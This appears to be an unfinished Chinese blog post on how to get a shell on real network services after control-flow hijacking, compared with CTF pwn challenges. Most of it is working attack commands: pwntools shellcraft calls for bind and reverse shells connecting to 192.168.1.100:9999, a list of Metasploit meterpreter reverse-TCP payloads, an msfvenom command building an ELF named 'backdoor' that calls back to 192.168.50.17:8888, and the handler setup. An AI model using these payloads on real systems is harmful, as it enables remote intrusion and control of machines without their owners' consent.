更新中…真实的网络程序和Pwn题目中把输入输出映射到网络端口,二者程序本体的交互接口显然是不同的,后一种的CTF题目,真的具有现实意义么?如果是真的网络程序,我控制流劫持后直接执行system(“/bin/sh”)可以拿到shell么?如果不能,我如何才能Getshell呢?
在进入正题前,我们先说点别的。
shellcode级别
shellcraft.mips.linux.bindsh(9999)
shellcraft.mips.linux.connect('192.168.1.100',9999)+shellcraft.mips.linux.dupsh()
shellcraft.amd64.linux.bindsh(9999)
shellcraft.amd64.linux.connect('192.168.1.100',9999)+shellcraft.amd64.linux.dupsh()
命令执行级别
文件级别
➜ msfvenom --list payloads | grep linux | grep meterpreter_reverse_tcp
linux/aarch64/meterpreter_reverse_tcp Run the Meterpreter / Mettle server payload (stageless)
linux/armbe/meterpreter_reverse_tcp Run the Meterpreter / Mettle server payload (stageless)
linux/armle/meterpreter_reverse_tcp Run the Meterpreter / Mettle server payload (stageless)
linux/mips64/meterpreter_reverse_tcp Run the Meterpreter / Mettle server payload (stageless)
linux/mipsbe/meterpreter_reverse_tcp Run the Meterpreter / Mettle server payload (stageless)
linux/mipsle/meterpreter_reverse_tcp Run the Meterpreter / Mettle server payload (stageless)
linux/ppc/meterpreter_reverse_tcp Run the Meterpreter / Mettle server payload (stageless)
linux/ppc64le/meterpreter_reverse_tcp Run the Meterpreter / Mettle server payload (stageless)
linux/ppce500v2/meterpreter_reverse_tcp Run the Meterpreter / Mettle server payload (stageless)
linux/x64/meterpreter_reverse_tcp Run the Meterpreter / Mettle server payload (stageless)
linux/x86/meterpreter_reverse_tcp Run the Meterpreter / Mettle server payload (stageless)
linux/zarch/meterpreter_reverse_tcp Run the Meterpreter / Mettle server payload (stageless)
➜ msfvenom -p linux/armle/meterpreter_reverse_tcp LHOST=192.168.50.17 LPORT=8888 -f elf -o backdoor
msf5 > use exploit/multi/handler
msf5 > set payload linux/armle/meterpreter/reverse_tcp
msf5 > set LPORT 8888
msf5 > set LHOST 0.0.0.0
msf5 > run